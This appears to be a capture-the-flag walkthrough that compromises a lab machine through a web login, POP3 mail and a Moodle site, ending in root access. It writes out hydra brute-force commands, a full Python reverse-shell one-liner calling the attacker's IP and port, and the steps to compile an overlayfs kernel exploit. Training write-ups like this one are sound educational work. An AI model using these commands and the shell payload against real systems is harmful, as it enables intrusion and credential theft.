Target IP: 10.10.93.234
Challenge Description:
Performing a port scan against the target machine shows there are four TCP ports open. There are SMTP and HTTP applications on their standard ports, but also two more applications on highers ports.
Performing an aggressive port scan against the four TCP ports returns the result above. By the looks of it, the higher ports have POP3 applications. I also obtained the application name which is Dovecot POP3. I will begin enumeration with the HTTP application on port 80 now.
Port 80: HTTP
The webpage above is displayed for this web application. This page informs me to visit /sev-home/ to login. Maybe the source-code of this webpage contains useful information?
Viewing the source-code of this webpage returns the result above. The JavaScript file with the name terminal.js sounds interesting to me.
The source-code of terminal.js JavaScript is shown above. The comment left behind gives a lot information. I obtained two usernames: Boris and Natalya, as shown above. Apparently the user Boris is using a default password, and a new encoded password has been provided to him. The encoded password is InvincibleHack3r. I can decode this using Cyberchef.
Using Cyberchef, I decoded the password and obtained the string InvincibleHack3r. Now I have the password InvincibleHack3r. This belongs to the user Boris.
Maybe I can use it at /sev-home/ directory? I entered the credentials Boris:InvincibleHack3r, as shown above and pressed Sign in. But it did not work. I tired the username in lowercase and it worked!
After logging in successfully, the webpage above was displayed to me. Apparently, to become an administrator of the system, I will need to email a qualified GNO supervisor. From previous enumeration, I know there are email applications running on the target machine. Maybe attacking these email applications can leak useful information? Before doing this, I will need to identify the possible GNO supervisors.
And bingo! The two possible qualified network operator supervisors are Natalya and Boris, as shown above.
Port 55007: POP3
I tried spraying the password InvincibleHack3r with the usernames Boris and
Natalya against the POP3 application on this port, but I had no luck as shown above. Time to bruteforce it.
I created a text file called usernames that contains just the username Natalya. Using hydra, I manged to bruteforce the password of the user Natalya. To do this, I used the command hydra -L usernames -P /usr/share/wordlists/fasttrack.txt pop3://10.10.93.234 -s 55007, as shown above. Now I have the credential Natalya:bird. Time to enumerate further.
Using the credentials, I managed to gain access to the emails of the user Natalya as shown above via POP3. This user has two emails.
The contents of the two emails are shown above. These emails contain a wealth of information: a set of new credentials xenia:RCP90rulez!, the internal domain network with the hostname severnaya-station.com/gnocertdir, and a username called Janus. Time to put these new information to practice.
I inserted the entry 10.10.93.234 severnaya-station.com inside my /etc/hosts file as shown above. Now time to visit the directory /gnocertdir as mentioned in the email.
Port 80: HTTP
Browsing to http://severnaya-station.com/gnocertdir/ displays the webpage above. It is running the application Moodle. Reading through the source-code of this webpage provides me some possible application versions, but it is hard to tell. Maybe once I login as a user, I can obtain this information?
Maybe I can use the credentials xenia:RCP90rulez! here to login as the user xenia.
After logging in successfully, the webpage above is presented to me. It mentions there is a new message from Dr Doak. Before reading this message, I wish to enumerate the application further to identify its version. After some digging around, I identified the application version is 2.2.3 which is vulnerable to RCE.
The email sent by Dr Doak to xenia is shown above. This email contains the new username doak. Maybe I can bruteforce the password again for this user doak via the POP3 application on the higher port?
Port 55007: POP3
And bingo! After bruteforcing the password of the username doak using hydra, I obtained the password goat as shown above. To bruteforce the password, I used the command hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://10.10.93.234 -s 55007. Time to read the emails of this user.
After logging in successfully as the user doak via telnet, I managed to obtain the only email. The contents of this email is shown above. This email contains the credentials dr_doak:4England! for the Moodle application. Maybe this user is the administrator of the application?
Port 80: HTTP
After logging in successfully as the user doak, the webpage above was presented to me.
This new user has a private file called s3cret.txt under the folder name for james, as shown above. The content of the s3cret.txt is also shown above. It informs me to visit /dir007key/for-007.jpg to obtain the new credentials.
Browsing to the new directory dispays the image above. I downloaded this image on my machine.
Using the tool exiftool, I managed to identify the encoded base64 password string that is under the tag Image Description, as shown above.
Then using the command echo eFdpbnRlcjE5OTV4IQ== | base64 --decode, I managed to obtain the password xWinter1995x! as shown above. This belongs to the administrator of the web application according to the s3cret.txt.
And bingo! Using the credentials admin:xWinter1995x!, I managed to login as the administrator user on the Moodle application! Now I have admin access, as shown above.
And it looks like the application name and version is Moodle 2.2.3, as shown above. The build number of the version Build: 20120514 is also shown.
Doing a Google search for Moodle 2.2.3 vulnerabilities led me to the website shown above. By the looks of it, the application is vulnerable to RCE due to a vulnerability in a spellchecker plugin. Time to find this plugin on the website. After some digging around, I identified the Aspell plugin is vulnerable. I can edit its path. Maybe I can replace the path with a Python reverse shell script to obtain a reverse shell connection?
I replaced the path of Aspell to the Python reverse shell script shown above. I started a listener on my machine at port 8443. The reverse shell I used is python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.55.153",8443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'. After this, I pressed the Save Changes button, but I did not obtain a connection back!
I also changed the Spell Engine to PSpellShell, as shown above.
Time to start the spellchecker application now. I created a new entry and pressed the spellcheck button, highlighted & circled in the image above. Then I immediately obtained a reverse shell connection from the target machine on my machine at port 8443.
Now I have a foothold on the target machine with the session as www-data, as shown above. Time to escalate my privileges on the target machine.
After landing a shell, I browsed to /home and noticed there are three users: boris, doak, and natalya. I did not find anything important inside the directories of these users.
Running the command uname -r shows the crucial information above. The target machine's kernel version is 3.13.0-32-generic, which is vulnerable to overlayfs privilege escalation.
I downloaded the local privilege escalation exploit shown above on my machine.
After transferring the exploit to the target machine at /tmp, I notice the target machine does not have gcc installed. Therefore, I used cc to compile the exploit. I used the command cc 37292.c -o exp to compile it. Then I used chmod +x exp to make the binary executable. I executed the exploit using ./exp and obtained a root shell, as shown above. Before doing all this, I was stuck and needed help. I had to execute the command sed -i "s/gcc/cc/g" 37292.c to avoid the gcc compilation error. Now I have a root shell.
The .root.txt flag is shown above. But this flag file informs me to visit /006-final/xvf7-flag/.
And bingo! The webpage above is shown to me after visiting the final webpage. All done. GG.